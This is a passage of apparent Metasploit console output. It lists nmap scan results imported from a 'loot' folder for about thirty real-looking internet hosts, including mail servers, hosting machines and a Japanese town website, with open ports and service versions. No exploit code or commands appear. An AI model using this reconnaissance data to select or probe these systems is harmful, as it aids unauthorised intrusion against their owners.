5600[*] Importing host 200.73.54.34
5601[*] Successfully imported /usr/share/knock/loot/nmap/nmap-200.73.54.34-fullport.xml
5602[*] Importing 'Nmap XML' data
5603[*] Import: Parsing with 'Nokogiri v1.10.8'
5604[*] Importing host 69.163.233.4
5605[*] Successfully imported /usr/share/knock/loot/nmap/nmap-69.163.233.4.xml
5606[*] Importing 'Nmap XML' data
5607[*] Import: Parsing with 'Nokogiri v1.10.8'
5608[*] Importing host 200.73.54.34
5609[*] Successfully imported /usr/share/knock/loot/nmap/nmap-200.73.54.34.xml
5610
5611Hosts
5612=====
5613
5614address mac name os_name os_flavor os_sp purpose info comments
5615------- --- ---- ------- --------- ----- ------- ---- --------
561637.1.207.121 teens-sins.net 2-Series 3.X device
561745.88.202.111 Linux 3.X server
561864.69.94.253 Unknown device
561969.163.233.4 ps54052.dreamhostps.com Linux 14.04 server
562074.117.180.192 embedded device
562182.94.222.131 Unknown device
562292.123.250.35 a92-123-250-35.deploy.static.akamaitechnologies.com embedded device
562392.123.250.65 a92-123-250-65.deploy.static.akamaitechnologies.com Linux 3.X server
5624104.244.76.231 Linux 3.X server
5625104.244.77.188 Linux 3.X server
5626104.244.79.89 Linux 3.X server
5627111.90.145.39 web16.support-emilid.com Linux 2.6.X server
5628149.126.72.220 149.126.72.220.ip.incapdns.net Linux 3.X server
5629151.106.38.107 ns3152160.ip-151-106-38.eu embedded device
5630158.69.13.254 ip254.ip-158-69-13.net 2-Series 2.6.X device
5631162.244.35.13 xnlog.com FreeBSD 7.X device
5632169.239.218.20 cp10.domains.co.za Linux 2.6.X server
5633173.214.244.169 173.214.244.169.serverel.net Unknown device
5634174.142.53.51 mail.marineland.ca Linux 3.X server
5635190.98.209.37 static.190.98.209.37.gtdinternet.com Unknown device
5636190.153.209.187 static.190.153.209.187.gtdinternet.com Unknown device
5637190.153.219.254 mail.evopoli.cl Linux 3.X server
5638200.73.54.34 mail.maxtel.cl Linux 2.6.X server
5639204.93.193.141 suzuka.mochahost.com Unknown device
5640206.48.140.40 Unknown device
5641207.246.147.189 2-Series device
5642207.246.147.190 Linux 4.X server
5643207.246.147.247 Linux 4.X server
5644207.246.147.248 Linux 4.X server
5645211.13.196.135 sv3.isle.ne.jp Linux 2.6.X server
5646218.45.5.97 www.town.koya.wakayama.jp Linux 2.6.X server
5647
5648Services
5649========
5650
5651host port proto name state info
5652---- ---- ----- ---- ----- ----
565337.1.207.121 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
565437.1.207.121 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
565537.1.207.121 67 tcp dhcps filtered
565637.1.207.121 67 udp dhcps unknown
565737.1.207.121 68 tcp dhcpc filtered
565837.1.207.121 68 udp dhcpc filtered
565937.1.207.121 69 tcp tftp filtered
566037.1.207.121 69 udp tftp unknown
566137.1.207.121 88 tcp kerberos-sec filtered
566237.1.207.121 88 udp kerberos-sec filtered
566337.1.207.121 123 tcp ntp filtered
566437.1.207.121 123 udp ntp unknown
566537.1.207.121 137 tcp netbios-ns filtered
566637.1.207.121 137 udp netbios-ns unknown
566737.1.207.121 138 tcp netbios-dgm filtered
566837.1.207.121 138 udp netbios-dgm unknown
566937.1.207.121 139 tcp netbios-ssn filtered
567037.1.207.121 139 udp netbios-ssn unknown
567137.1.207.121 161 tcp snmp filtered
567237.1.207.121 161 udp snmp unknown
567337.1.207.121 162 tcp snmptrap filtered
567437.1.207.121 162 udp snmptrap unknown
567537.1.207.121 389 tcp ldap filtered
567637.1.207.121 389 udp ldap unknown
567737.1.207.121 520 tcp efs filtered
567837.1.207.121 520 udp route unknown
567937.1.207.121 2049 tcp nfs filtered
568037.1.207.121 2049 udp nfs filtered
568145.88.202.111 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u1 protocol 2.0
568245.88.202.111 53 tcp domain open PowerDNS Authoritative Server 4.2.0-rc3
568345.88.202.111 53 udp domain open PowerDNS Authoritative Server 4.2.0-rc3
568445.88.202.111 67 tcp dhcps closed
568545.88.202.111 67 udp dhcps unknown
568645.88.202.111 68 tcp dhcpc closed
568745.88.202.111 68 udp dhcpc unknown
568845.88.202.111 69 tcp tftp closed
568945.88.202.111 69 udp tftp closed
569045.88.202.111 80 tcp http open nginx
569145.88.202.111 88 tcp kerberos-sec closed
569245.88.202.111 88 udp kerberos-sec unknown
569345.88.202.111 123 tcp ntp closed
569445.88.202.111 123 udp ntp closed
569545.88.202.111 137 tcp netbios-ns closed
569645.88.202.111 137 udp netbios-ns filtered
569745.88.202.111 138 tcp netbios-dgm closed
569845.88.202.111 138 udp netbios-dgm filtered
569945.88.202.111 139 tcp netbios-ssn closed
570045.88.202.111 139 udp netbios-ssn closed
570145.88.202.111 161 tcp snmp closed
570245.88.202.111 161 udp snmp closed
570345.88.202.111 162 tcp snmptrap closed
570445.88.202.111 162 udp snmptrap closed
570545.88.202.111 179 tcp bgp filtered
570645.88.202.111 389 tcp ldap closed
570745.88.202.111 389 udp ldap unknown
570845.88.202.111 443 tcp ssl/http open nginx
570945.88.202.111 520 tcp efs closed
571045.88.202.111 520 udp route unknown
571145.88.202.111 2049 tcp nfs closed
571245.88.202.111 2049 udp nfs closed
571345.88.202.111 10050 tcp tcpwrapped open
571464.69.94.253 53 tcp domain filtered
571564.69.94.253 53 udp domain unknown
571664.69.94.253 67 tcp dhcps filtered
571764.69.94.253 67 udp dhcps unknown
571864.69.94.253 68 tcp dhcpc filtered
571964.69.94.253 68 udp dhcpc unknown
572064.69.94.253 69 tcp tftp filtered
572164.69.94.253 69 udp tftp unknown
572264.69.94.253 88 tcp kerberos-sec filtered
572364.69.94.253 88 udp kerberos-sec unknown
572464.69.94.253 123 tcp ntp filtered
572564.69.94.253 123 udp ntp unknown
572664.69.94.253 137 tcp netbios-ns filtered
572764.69.94.253 137 udp netbios-ns unknown
572864.69.94.253 138 tcp netbios-dgm filtered
572964.69.94.253 138 udp netbios-dgm unknown
573064.69.94.253 139 tcp netbios-ssn filtered
573164.69.94.253 139 udp netbios-ssn unknown
573264.69.94.253 161 tcp snmp filtered
573364.69.94.253 161 udp snmp unknown
573464.69.94.253 162 tcp snmptrap filtered
573564.69.94.253 162 udp snmptrap unknown
573664.69.94.253 389 tcp ldap filtered
573764.69.94.253 389 udp ldap unknown
573864.69.94.253 520 tcp efs filtered
573964.69.94.253 520 udp route unknown
574064.69.94.253 2049 tcp nfs filtered
574164.69.94.253 2049 udp nfs unknown
574269.163.233.4 21 tcp ftp open 220 DreamHost FTP Server\x0d\x0a
574369.163.233.4 22 tcp ssh open SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
574469.163.233.4 25 tcp open
574569.163.233.4 53 tcp domain closed
574669.163.233.4 53 udp domain unknown
574769.163.233.4 67 tcp dhcps closed
574869.163.233.4 67 udp dhcps closed
574969.163.233.4 68 tcp dhcpc closed
575069.163.233.4 68 udp dhcpc unknown
575169.163.233.4 69 tcp tftp closed
575269.163.233.4 69 udp tftp closed
575369.163.233.4 88 tcp kerberos-sec closed
575469.163.233.4 88 udp kerberos-sec unknown
575569.163.233.4 123 tcp ntp closed
575669.163.233.4 123 udp ntp unknown
575769.163.233.4 137 tcp netbios-ns closed
575869.163.233.4 137 udp netbios-ns closed
575969.163.233.4 138 tcp netbios-dgm closed
576069.163.233.4 138 udp netbios-dgm closed
576169.163.233.4 139 tcp netbios-ssn closed
576269.163.233.4 139 udp netbios-ssn unknown
576369.163.233.4 161 tcp snmp closed
576469.163.233.4 161 udp snmp closed
576569.163.233.4 162 tcp snmptrap closed
576669.163.233.4 162 udp snmptrap closed
576769.163.233.4 389 tcp ldap closed
576869.163.233.4 389 udp ldap unknown
576969.163.233.4 520 tcp efs closed
577069.163.233.4 520 udp route closed
577169.163.233.4 2049 tcp nfs closed
577269.163.233.4 2049 udp nfs unknown
577374.117.180.192 21 tcp ftp filtered 220 Hello.\x0d\x0a
577474.117.180.192 22 tcp ssh filtered
577574.117.180.192 25 tcp smtp filtered
577674.117.180.192 53 tcp domain closed
577774.117.180.192 53 udp domain unknown
577874.117.180.192 67 tcp dhcps closed
577974.117.180.192 67 udp dhcps unknown
578074.117.180.192 68 tcp dhcpc closed
578174.117.180.192 68 udp dhcpc closed
578274.117.180.192 69 tcp tftp closed
578374.117.180.192 69 udp tftp closed
578474.117.180.192 80 tcp http filtered
578574.117.180.192 88 tcp kerberos-sec closed
578674.117.180.192 88 udp kerberos-sec closed
578774.117.180.192 110 tcp pop3 filtered
578874.117.180.192 111 tcp rpcbind filtered
578974.117.180.192 123 tcp ntp closed
579074.117.180.192 123 udp ntp unknown
579174.117.180.192 137 tcp netbios-ns closed
579274.117.180.192 137 udp netbios-ns closed
579374.117.180.192 138 tcp netbios-dgm closed
579474.117.180.192 138 udp netbios-dgm unknown
579574.117.180.192 139 tcp netbios-ssn closed
579674.117.180.192 139 udp netbios-ssn unknown
579774.117.180.192 143 tcp imap filtered
579874.117.180.192 161 tcp snmp closed
579974.117.180.192 161 udp snmp closed
580074.117.180.192 162 tcp snmptrap closed
580174.117.180.192 162 udp snmptrap unknown
580274.117.180.192 323 tcp rpki-rtr filtered
580374.117.180.192 389 tcp ldap closed
580474.117.180.192 389 udp ldap closed
580574.117.180.192 443 tcp https filtered
580674.117.180.192 465 tcp ssl/smtp open Exim smtpd 4.92.3
580774.117.180.192 520 tcp efs closed
580874.117.180.192 520 udp route unknown
580974.117.180.192 587 tcp submission filtered
581074.117.180.192 873 tcp rsync filtered
581174.117.180.192 993 tcp imaps filtered
581274.117.180.192 995 tcp pop3s filtered
581374.117.180.192 2049 tcp nfs closed
581474.117.180.192 2049 udp nfs closed
581574.117.180.192 2525 tcp smtp open Exim smtpd
581674.117.180.192 3306 tcp mysql filtered
581774.117.180.192 4949 tcp tcpwrapped open
581874.117.180.192 5666 tcp tcpwrapped open
581974.117.180.192 6380 tcp filtered
582074.117.180.192 9306 tcp sphinx-search open Sphinx Search daemon 2.1.5-id64-release
582174.117.180.192 11211 tcp memcache filtered
582282.94.222.131 53 udp domain unknown
582382.94.222.131 67 udp dhcps unknown
582482.94.222.131 68 udp dhcpc unknown
582582.94.222.131 69 udp tftp unknown
582682.94.222.131 88 udp kerberos-sec unknown
582782.94.222.131 123 udp ntp unknown
582882.94.222.131 137 udp netbios-ns unknown
582982.94.222.131 138 udp netbios-dgm unknown
583082.94.222.131 139 udp netbios-ssn unknown
583182.94.222.131 161 udp snmp unknown
583282.94.222.131 162 udp snmptrap unknown
583382.94.222.131 389 udp ldap unknown
583482.94.222.131 520 udp route unknown
583582.94.222.131 2049 udp nfs unknown
583692.123.250.35 53 tcp domain closed
583792.123.250.35 53 udp domain closed
583892.123.250.35 67 tcp dhcps filtered
583992.123.250.35 67 udp dhcps unknown
584092.123.250.35 68 tcp dhcpc filtered
584192.123.250.35 68 udp dhcpc unknown
584292.123.250.35 69 tcp tftp filtered
584392.123.250.35 69 udp tftp unknown
584492.123.250.35 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
584592.123.250.35 88 tcp kerberos-sec filtered
584692.123.250.35 88 udp kerberos-sec unknown
584792.123.250.35 123 tcp ntp filtered
584892.123.250.35 123 udp ntp unknown
584992.123.250.35 137 tcp netbios-ns filtered
585092.123.250.35 137 udp netbios-ns unknown
585192.123.250.35 138 tcp netbios-dgm filtered
585292.123.250.35 138 udp netbios-dgm unknown
585392.123.250.35 139 tcp netbios-ssn filtered
585492.123.250.35 139 udp netbios-ssn unknown
585592.123.250.35 161 tcp snmp filtered
585692.123.250.35 161 udp snmp unknown
585792.123.250.35 162 tcp snmptrap filtered
585892.123.250.35 162 udp snmptrap unknown
585992.123.250.35 389 tcp ldap filtered
586092.123.250.35 389 udp ldap unknown
586192.123.250.35 443 tcp ssl/https open
586292.123.250.35 520 tcp efs filtered
586392.123.250.35 520 udp route unknown
586492.123.250.35 2049 tcp nfs filtered
586592.123.250.35 2049 udp nfs unknown
586692.123.250.35 8883 tcp secure-mqtt open
586792.123.250.65 53 tcp domain filtered
586892.123.250.65 53 udp domain unknown
586992.123.250.65 67 tcp dhcps filtered
587092.123.250.65 67 udp dhcps unknown
587192.123.250.65 68 tcp dhcpc filtered
587292.123.250.65 68 udp dhcpc unknown
587392.123.250.65 69 tcp tftp filtered
587492.123.250.65 69 udp tftp unknown
587592.123.250.65 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
587692.123.250.65 88 tcp kerberos-sec filtered
587792.123.250.65 88 udp kerberos-sec unknown
587892.123.250.65 123 tcp ntp filtered
587992.123.250.65 123 udp ntp unknown
588092.123.250.65 137 tcp netbios-ns filtered
588192.123.250.65 137 udp netbios-ns unknown
588292.123.250.65 138 tcp netbios-dgm filtered
588392.123.250.65 138 udp netbios-dgm unknown
588492.123.250.65 139 tcp netbios-ssn filtered
588592.123.250.65 139 udp netbios-ssn unknown
588692.123.250.65 161 tcp snmp filtered
588792.123.250.65 161 udp snmp unknown
588892.123.250.65 162 tcp snmptrap filtered
588992.123.250.65 162 udp snmptrap unknown
589092.123.250.65 389 tcp ldap filtered
589192.123.250.65 389 udp ldap unknown
589292.123.250.65 443 tcp ssl/https open
589392.123.250.65 520 tcp efs filtered
589492.123.250.65 520 udp route unknown
589592.123.250.65 2049 tcp nfs filtered
589692.123.250.65 2049 udp nfs unknown
589792.123.250.65 8883 tcp secure-mqtt open
5898104.244.76.231 53 tcp domain filtered
5899104.244.76.231 53 udp domain unknown
5900104.244.76.231 67 tcp dhcps filtered
5901104.244.76.231 67 udp dhcps unknown
5902104.244.76.231 68 tcp dhcpc filtered
5903104.244.76.231 68 udp dhcpc unknown
5904104.244.76.231 69 tcp tftp filtered
5905104.244.76.231 69 udp tftp unknown
5906104.244.76.231 80 tcp http open nginx
5907104.244.76.231 88 tcp kerberos-sec filtered
5908104.244.76.231 88 udp kerberos-sec unknown
5909104.244.76.231 123 tcp ntp filtered
5910104.244.76.231 123 udp ntp unknown
5911104.244.76.231 137 tcp netbios-ns filtered
5912104.244.76.231 137 udp netbios-ns unknown
5913104.244.76.231 138 tcp netbios-dgm filtered
5914104.244.76.231 138 udp netbios-dgm unknown
5915104.244.76.231 139 tcp netbios-ssn filtered
5916104.244.76.231 139 udp netbios-ssn unknown
5917104.244.76.231 161 tcp snmp filtered
5918104.244.76.231 161 udp snmp unknown
5919104.244.76.231 162 tcp snmptrap filtered
5920104.244.76.231 162 udp snmptrap unknown
5921104.244.76.231 389 tcp ldap filtered
5922104.244.76.231 389 udp ldap unknown
5923104.244.76.231 443 tcp ssl/http open nginx
5924104.244.76.231 520 tcp efs filtered
5925104.244.76.231 520 udp route unknown
5926104.244.76.231 2049 tcp nfs filtered
5927104.244.76.231 2049 udp nfs unknown
5928104.244.76.231 5040 tcp unknown closed
5929104.244.76.231 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
5930104.244.76.231 16221 tcp closed
5931104.244.76.231 23022 tcp closed
5932104.244.76.231 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5933104.244.77.188 53 tcp domain filtered
5934104.244.77.188 53 udp domain unknown
5935104.244.77.188 67 tcp dhcps filtered
5936104.244.77.188 67 udp dhcps unknown
5937104.244.77.188 68 tcp dhcpc filtered
5938104.244.77.188 68 udp dhcpc unknown
5939104.244.77.188 69 tcp tftp filtered
5940104.244.77.188 69 udp tftp unknown
5941104.244.77.188 80 tcp http open nginx
5942104.244.77.188 88 tcp kerberos-sec filtered
5943104.244.77.188 88 udp kerberos-sec unknown
5944104.244.77.188 123 tcp ntp filtered
5945104.244.77.188 123 udp ntp unknown
5946104.244.77.188 137 tcp netbios-ns filtered
5947104.244.77.188 137 udp netbios-ns unknown
5948104.244.77.188 138 tcp netbios-dgm filtered
5949104.244.77.188 138 udp netbios-dgm unknown
5950104.244.77.188 139 tcp netbios-ssn filtered
5951104.244.77.188 139 udp netbios-ssn unknown
5952104.244.77.188 161 tcp snmp filtered
5953104.244.77.188 161 udp snmp unknown
5954104.244.77.188 162 tcp snmptrap filtered
5955104.244.77.188 162 udp snmptrap unknown
5956104.244.77.188 389 tcp ldap filtered
5957104.244.77.188 389 udp ldap unknown
5958104.244.77.188 443 tcp ssl/http open nginx
5959104.244.77.188 520 tcp efs filtered
5960104.244.77.188 520 udp route unknown
5961104.244.77.188 2049 tcp nfs filtered
5962104.244.77.188 2049 udp nfs unknown
5963104.244.77.188 5040 tcp unknown closed
5964104.244.77.188 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
5965104.244.77.188 16221 tcp closed
5966104.244.77.188 23022 tcp closed
5967104.244.77.188 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5968104.244.79.89 53 tcp domain filtered
5969104.244.79.89 53 udp domain unknown
5970104.244.79.89 67 tcp dhcps filtered
5971104.244.79.89 67 udp dhcps unknown
5972104.244.79.89 68 tcp dhcpc filtered
5973104.244.79.89 68 udp dhcpc unknown
5974104.244.79.89 69 tcp tftp filtered
5975104.244.79.89 69 udp tftp unknown
5976104.244.79.89 80 tcp http open nginx
5977104.244.79.89 88 tcp kerberos-sec filtered
5978104.244.79.89 88 udp kerberos-sec unknown
5979104.244.79.89 123 tcp ntp filtered
5980104.244.79.89 123 udp ntp unknown
5981104.244.79.89 137 tcp netbios-ns filtered
5982104.244.79.89 137 udp netbios-ns unknown
5983104.244.79.89 138 tcp netbios-dgm filtered
5984104.244.79.89 138 udp netbios-dgm unknown
5985104.244.79.89 139 tcp netbios-ssn filtered
5986104.244.79.89 139 udp netbios-ssn unknown
5987104.244.79.89 161 tcp snmp filtered
5988104.244.79.89 161 udp snmp unknown
5989104.244.79.89 162 tcp snmptrap filtered
5990104.244.79.89 162 udp snmptrap unknown
5991104.244.79.89 389 tcp ldap filtered
5992104.244.79.89 389 udp ldap unknown
5993104.244.79.89 443 tcp ssl/http open nginx
5994104.244.79.89 520 tcp efs filtered
5995104.244.79.89 520 udp route unknown
5996104.244.79.89 2049 tcp nfs filtered
5997104.244.79.89 2049 udp nfs unknown
5998104.244.79.89 7910 tcp ssl/http open nginx
5999104.244.79.89 7920 tcp unknown closed
6000104.244.79.89 7930 tcp closed
6001104.244.79.89 16001 tcp http open MiniServ 1.930 Webmin httpd
6002104.244.79.89 16010 tcp ssl/http open nginx
6003104.244.79.89 16221 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6004104.244.79.89 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6005111.90.145.39 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6006111.90.145.39 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6007111.90.145.39 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6008111.90.145.39 67 tcp dhcps closed
6009111.90.145.39 67 udp dhcps closed
6010111.90.145.39 68 tcp dhcpc closed
6011111.90.145.39 68 udp dhcpc unknown
6012111.90.145.39 69 tcp tftp closed
6013111.90.145.39 69 udp tftp unknown
6014111.90.145.39 88 tcp kerberos-sec closed
6015111.90.145.39 88 udp kerberos-sec unknown
6016111.90.145.39 123 tcp ntp closed
6017111.90.145.39 123 udp ntp closed
6018111.90.145.39 137 tcp netbios-ns closed
6019111.90.145.39 137 udp netbios-ns unknown
6020111.90.145.39 138 tcp netbios-dgm closed
6021111.90.145.39 138 udp netbios-dgm unknown
6022111.90.145.39 139 tcp netbios-ssn filtered
6023111.90.145.39 139 udp netbios-ssn closed
6024111.90.145.39 161 tcp snmp closed
6025111.90.145.39 161 udp snmp unknown
6026111.90.145.39 162 tcp snmptrap closed
6027111.90.145.39 162 udp snmptrap closed
6028111.90.145.39 389 tcp ldap closed
6029111.90.145.39 389 udp ldap unknown
6030111.90.145.39 520 tcp efs closed
6031111.90.145.39 520 udp route closed
6032111.90.145.39 2049 tcp nfs closed
6033111.90.145.39 2049 udp nfs closed
6034149.126.72.220 25 tcp smtp closed
6035149.126.72.220 51 tcp tcpwrapped open
6036149.126.72.220 53 tcp domain open
6037149.126.72.220 53 udp domain open
6038149.126.72.220 65 tcp tcpwrapped open
6039149.126.72.220 66 tcp tcpwrapped open
6040149.126.72.220 67 tcp dhcps filtered
6041149.126.72.220 67 udp dhcps unknown
6042149.126.72.220 68 tcp dhcpc filtered
6043149.126.72.220 68 udp dhcpc unknown
6044149.126.72.220 69 tcp tftp filtered
6045149.126.72.220 69 udp tftp unknown
6046149.126.72.220 80 tcp tcpwrapped open
6047149.126.72.220 81 tcp tcpwrapped open
6048149.126.72.220 82 tcp tcpwrapped open
6049149.126.72.220 83 tcp tcpwrapped open
6050149.126.72.220 84 tcp tcpwrapped open
6051149.126.72.220 85 tcp tcpwrapped open
6052149.126.72.220 86 tcp tcpwrapped open
6053149.126.72.220 88 tcp http open Incapsula CDN httpd
6054149.126.72.220 88 udp kerberos-sec unknown
6055149.126.72.220 89 tcp tcpwrapped open
6056149.126.72.220 90 tcp tcpwrapped open
6057149.126.72.220 91 tcp tcpwrapped open
6058149.126.72.220 92 tcp tcpwrapped open
6059149.126.72.220 98 tcp tcpwrapped open
6060149.126.72.220 99 tcp tcpwrapped open
6061149.126.72.220 123 tcp ntp filtered
6062149.126.72.220 123 udp ntp unknown
6063149.126.72.220 137 tcp netbios-ns filtered
6064149.126.72.220 137 udp netbios-ns filtered
6065149.126.72.220 138 tcp netbios-dgm filtered
6066149.126.72.220 138 udp netbios-dgm filtered
6067149.126.72.220 139 tcp netbios-ssn closed
6068149.126.72.220 139 udp netbios-ssn unknown
6069149.126.72.220 160 tcp sgmp-traps closed
6070149.126.72.220 161 tcp snmp filtered
6071149.126.72.220 161 udp snmp unknown
6072149.126.72.220 162 tcp snmptrap filtered
6073149.126.72.220 162 udp snmptrap unknown
6074149.126.72.220 189 tcp tcpwrapped open
6075149.126.72.220 190 tcp tcpwrapped open
6076149.126.72.220 192 tcp tcpwrapped open
6077149.126.72.220 243 tcp tcpwrapped open
6078149.126.72.220 285 tcp tcpwrapped open
6079149.126.72.220 314 tcp tcpwrapped open
6080149.126.72.220 343 tcp tcpwrapped open
6081149.126.72.220 347 tcp tcpwrapped open
6082149.126.72.220 385 tcp tcpwrapped open
6083149.126.72.220 389 tcp ssl/http open Incapsula CDN httpd
6084149.126.72.220 389 udp ldap unknown
6085149.126.72.220 400 tcp tcpwrapped open
6086149.126.72.220 440 tcp tcpwrapped open
6087149.126.72.220 441 tcp tcpwrapped open
6088149.126.72.220 442 tcp tcpwrapped open
6089149.126.72.220 443 tcp ssl/tcpwrapped open
6090149.126.72.220 444 tcp tcpwrapped open
6091149.126.72.220 445 tcp microsoft-ds closed
6092149.126.72.220 446 tcp tcpwrapped open
6093149.126.72.220 447 tcp tcpwrapped open
6094149.126.72.220 448 tcp tcpwrapped open
6095149.126.72.220 449 tcp tcpwrapped open
6096149.126.72.220 452 tcp tcpwrapped open
6097149.126.72.220 461 tcp tcpwrapped open
6098149.126.72.220 462 tcp tcpwrapped open
6099149.126.72.220 480 tcp tcpwrapped open
6100149.126.72.220 485 tcp tcpwrapped open
6101149.126.72.220 487 tcp tcpwrapped open
6102149.126.72.220 488 tcp tcpwrapped open
6103149.126.72.220 491 tcp tcpwrapped open
6104149.126.72.220 520 tcp efs filtered
6105149.126.72.220 520 udp route unknown
6106149.126.72.220 555 tcp tcpwrapped open
6107149.126.72.220 556 tcp tcpwrapped open
6108149.126.72.220 587 tcp tcpwrapped open
6109149.126.72.220 631 tcp tcpwrapped open
6110149.126.72.220 632 tcp tcpwrapped open
6111149.126.72.220 636 tcp tcpwrapped open
6112149.126.72.220 743 tcp tcpwrapped open
6113149.126.72.220 772 tcp tcpwrapped open
6114149.126.72.220 777 tcp tcpwrapped open
6115149.126.72.220 782 tcp tcpwrapped open
6116149.126.72.220 785 tcp tcpwrapped open
6117149.126.72.220 800 tcp tcpwrapped open
6118149.126.72.220 801 tcp tcpwrapped open
6119149.126.72.220 805 tcp tcpwrapped open
6120149.126.72.220 806 tcp tcpwrapped open
6121149.126.72.220 809 tcp tcpwrapped open
6122149.126.72.220 843 tcp tcpwrapped open
6123149.126.72.220 853 tcp tcpwrapped open
6124149.126.72.220 885 tcp tcpwrapped open
6125149.126.72.220 886 tcp tcpwrapped open
6126149.126.72.220 887 tcp tcpwrapped open
6127149.126.72.220 888 tcp tcpwrapped open
6128149.126.72.220 943 tcp tcpwrapped open
6129149.126.72.220 947 tcp tcpwrapped open
6130149.126.72.220 953 tcp tcpwrapped open
6131149.126.72.220 990 tcp tcpwrapped open
6132149.126.72.220 995 tcp tcpwrapped open
6133149.126.72.220 998 tcp tcpwrapped open
6134149.126.72.220 999 tcp tcpwrapped open
6135149.126.72.220 1000 tcp tcpwrapped open
6136149.126.72.220 1002 tcp tcpwrapped open
6137149.126.72.220 1024 tcp tcpwrapped open
6138149.126.72.220 1025 tcp tcpwrapped open
6139149.126.72.220 1028 tcp tcpwrapped open
6140149.126.72.220 1080 tcp tcpwrapped open
6141149.126.72.220 1103 tcp tcpwrapped open
6142149.126.72.220 1111 tcp tcpwrapped open
6143149.126.72.220 1180 tcp tcpwrapped open
6144149.126.72.220 1181 tcp tcpwrapped open
6145149.126.72.220 1207 tcp tcpwrapped open
6146149.126.72.220 1234 tcp tcpwrapped open
6147149.126.72.220 1250 tcp tcpwrapped open
6148149.126.72.220 1283 tcp tcpwrapped open
6149149.126.72.220 1291 tcp tcpwrapped open
6150149.126.72.220 1292 tcp tcpwrapped open
6151149.126.72.220 1293 tcp tcpwrapped open
6152149.126.72.220 1337 tcp tcpwrapped open
6153149.126.72.220 1344 tcp tcpwrapped open
6154149.126.72.220 1355 tcp tcpwrapped open
6155149.126.72.220 1364 tcp tcpwrapped open
6156149.126.72.220 1366 tcp tcpwrapped open
6157149.126.72.220 1377 tcp tcpwrapped open
6158149.126.72.220 1387 tcp tcpwrapped open
6159149.126.72.220 1388 tcp tcpwrapped open
6160149.126.72.220 1433 tcp tcpwrapped open
6161149.126.72.220 1443 tcp tcpwrapped open
6162149.126.72.220 1447 tcp tcpwrapped open
6163149.126.72.220 1450 tcp tcpwrapped open
6164149.126.72.220 1451 tcp tcpwrapped open
6165149.126.72.220 1452 tcp tcpwrapped open
6166149.126.72.220 1453 tcp tcpwrapped open
6167149.126.72.220 1454 tcp tcpwrapped open
6168149.126.72.220 1455 tcp tcpwrapped open
6169149.126.72.220 1456 tcp tcpwrapped open
6170149.126.72.220 1457 tcp tcpwrapped open
6171149.126.72.220 1458 tcp tcpwrapped open
6172149.126.72.220 1459 tcp tcpwrapped open
6173149.126.72.220 1460 tcp tcpwrapped open
6174149.126.72.220 1494 tcp tcpwrapped open
6175149.126.72.220 1935 tcp tcpwrapped open
6176149.126.72.220 1950 tcp tcpwrapped open
6177149.126.72.220 1951 tcp tcpwrapped open
6178149.126.72.220 1952 tcp tcpwrapped open
6179149.126.72.220 1953 tcp tcpwrapped open
6180149.126.72.220 1954 tcp tcpwrapped open
6181149.126.72.220 1955 tcp tcpwrapped open
6182149.126.72.220 1956 tcp tcpwrapped open
6183149.126.72.220 1957 tcp tcpwrapped open
6184149.126.72.220 1958 tcp tcpwrapped open
6185149.126.72.220 1959 tcp tcpwrapped open
6186149.126.72.220 1960 tcp tcpwrapped open
6187149.126.72.220 1964 tcp tcpwrapped open
6188149.126.72.220 1965 tcp tcpwrapped open
6189149.126.72.220 1966 tcp tcpwrapped open
6190149.126.72.220 1967 tcp tcpwrapped open
6191149.126.72.220 1968 tcp tcpwrapped open
6192149.126.72.220 1969 tcp tcpwrapped open
6193149.126.72.220 1970 tcp tcpwrapped open
6194149.126.72.220 1971 tcp tcpwrapped open
6195149.126.72.220 1972 tcp tcpwrapped open
6196149.126.72.220 1973 tcp tcpwrapped open
6197149.126.72.220 1974 tcp tcpwrapped open
6198149.126.72.220 1975 tcp tcpwrapped open
6199149.126.72.220 1976 tcp tcpwrapped open
6200149.126.72.220 1977 tcp tcpwrapped open
6201149.126.72.220 1978 tcp tcpwrapped open
6202149.126.72.220 1979 tcp tcpwrapped open
6203149.126.72.220 1980 tcp tcpwrapped open
6204149.126.72.220 1981 tcp tcpwrapped open
6205149.126.72.220 1982 tcp tcpwrapped open
6206149.126.72.220 1983 tcp tcpwrapped open
6207149.126.72.220 1984 tcp tcpwrapped open
6208149.126.72.220 1985 tcp tcpwrapped open
6209149.126.72.220 1986 tcp tcpwrapped open
6210149.126.72.220 1987 tcp tcpwrapped open
6211149.126.72.220 1988 tcp tcpwrapped open
6212149.126.72.220 1989 tcp tcpwrapped open
6213149.126.72.220 2000 tcp tcpwrapped open
6214149.126.72.220 2001 tcp tcpwrapped open
6215149.126.72.220 2006 tcp tcpwrapped open
6216149.126.72.220 2012 tcp tcpwrapped open
6217149.126.72.220 2020 tcp tcpwrapped open
6218149.126.72.220 2048 tcp tcpwrapped open
6219149.126.72.220 2049 tcp http open Incapsula CDN httpd
6220149.126.72.220 2049 udp nfs unknown
6221149.126.72.220 2050 tcp tcpwrapped open
6222149.126.72.220 2051 tcp tcpwrapped open
6223149.126.72.220 2052 tcp tcpwrapped open
6224149.126.72.220 2053 tcp tcpwrapped open
6225149.126.72.220 2054 tcp tcpwrapped open
6226149.126.72.220 2055 tcp tcpwrapped open
